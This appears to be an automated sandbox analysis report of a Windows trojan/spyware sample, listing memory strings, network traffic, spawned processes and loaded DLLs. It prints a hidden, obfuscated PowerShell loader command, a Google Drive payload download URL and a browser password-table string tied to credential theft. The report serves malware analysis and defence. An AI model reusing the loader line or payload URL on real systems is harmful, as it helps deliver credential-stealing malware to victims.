Source: msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025E92000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025EC4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025E83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025E8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: msiexec.exe, 0000000B.00000002.3814361627.000000000A11A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 0000000B.00000002.3814361627.000000000A11A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3826784602.00000000252A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1Rl2Q3jifSIE7VULdNBFwLR_HP9yjBG3k
Source: msiexec.exe, 0000000B.00000002.3814361627.000000000A11A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1Rl2Q3jifSIE7VULdNBFwLR_HP9yjBG3knz
Source: msiexec.exe, 0000000B.00000003.2685537438.000000000A195000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3814361627.000000000A11A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1Rl2Q3jifSIE7VULdNBFwLR_HP9yjBG3k&export=download
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025DBB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025D4B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025D4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025DBB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025D75000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: msiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: msiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A18E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: msiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A18E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: msiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: msiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025EC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025EBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 59378 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59376 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59391 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59374 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59378
Source: unknown	Network traffic detected: HTTP traffic on port 59386 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59374
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59373
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59376
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59370
Source: unknown	Network traffic detected: HTTP traffic on port 59380 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59391
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59371
Source: unknown	Network traffic detected: HTTP traffic on port 59388 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59384 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59390
Source: unknown	Network traffic detected: HTTP traffic on port 59382 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59371 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59373 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59390 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59389
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59388
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59384
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59386
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59380
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59382
Source: unknown	Network traffic detected: HTTP traffic on port 59389 -> 443

Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59370 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:59371 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:59389 version: TLS 1.2

Source: C:\Users\user\Desktop\r5yYt97sfB.exe

Code function: 1_2_00405421 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

1_2_00405421

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto\r5yYt97sfB.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\r5yYt97sfB.exe

Code function: 1_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

1_2_004033B6

Source: C:\Users\user\Desktop\r5yYt97sfB.exe

File created: C:\Windows\resources\unthick.ini

Jump to behavior

Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Code function: 1_2_00406847	1_2_00406847
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Code function: 1_2_00404C5E	1_2_00404C5E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02DFD278	11_2_02DFD278
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02DF5362	11_2_02DF5362
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02DFC1A3	11_2_02DFC1A3
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02DFC738	11_2_02DFC738
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02DFC468	11_2_02DFC468
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02DFCA08	11_2_02DFCA08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02DFE988	11_2_02DFE988
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02DFCFA9	11_2_02DFCFA9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02DFCCD8	11_2_02DFCCD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02DF3AA1	11_2_02DF3AA1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02DF39ED	11_2_02DF39ED
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02DF29EC	11_2_02DF29EC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02DF69A0	11_2_02DF69A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02DFE97B	11_2_02DFE97B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02DFF974	11_2_02DFF974
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02DF3E09	11_2_02DF3E09
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02DF6FC8	11_2_02DF6FC8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02DF9DE0	11_2_02DF9DE0

Source: r5yYt97sfB.exe

Static PE information: invalid certificate

Source: r5yYt97sfB.exe, 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameharbinger.exeJ vs r5yYt97sfB.exe
Source: r5yYt97sfB.exe	Binary or memory string: OriginalFilenameharbinger.exeJ vs r5yYt97sfB.exe
Source: r5yYt97sfB.exe.5.dr	Binary or memory string: OriginalFilenameharbinger.exeJ vs r5yYt97sfB.exe

Source: r5yYt97sfB.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/16@5/5

Source: C:\Users\user\Desktop\r5yYt97sfB.exe

1_2_004033B6

Source: C:\Users\user\Desktop\r5yYt97sfB.exe

Code function: 1_2_004046E2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

1_2_004046E2

Source: C:\Users\user\Desktop\r5yYt97sfB.exe

Code function: 1_2_00402095 CoCreateInstance,

1_2_00402095

Source: C:\Users\user\Desktop\r5yYt97sfB.exe

File created: C:\Users\user\AppData\Local\magmaet

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1412:120:WilError_03

Source: C:\Users\user\Desktop\r5yYt97sfB.exe

File created: C:\Users\user~1\AppData\Local\Temp\nsd6439.tmp

Jump to behavior

Source: r5yYt97sfB.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\r5yYt97sfB.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\r5yYt97sfB.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025F9E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025F92000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025F5E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025F6C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025F4E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: r5yYt97sfB.exe	Virustotal: Detection: 71%
Source: r5yYt97sfB.exe	ReversingLabs: Detection: 55%

Source: C:\Users\user\Desktop\r5yYt97sfB.exe

File read: C:\Users\user\Desktop\r5yYt97sfB.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\r5yYt97sfB.exe "C:\Users\user\Desktop\r5yYt97sfB.exe"
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Forebrace7=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Dipterologist.Fra';$Afskalning=$Forebrace7.SubString(15810,3);.$Afskalning($Forebrace7) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Forebrace7=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Dipterologist.Fra';$Afskalning=$Forebrace7.SubString(15810,3);.$Afskalning($Forebrace7) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
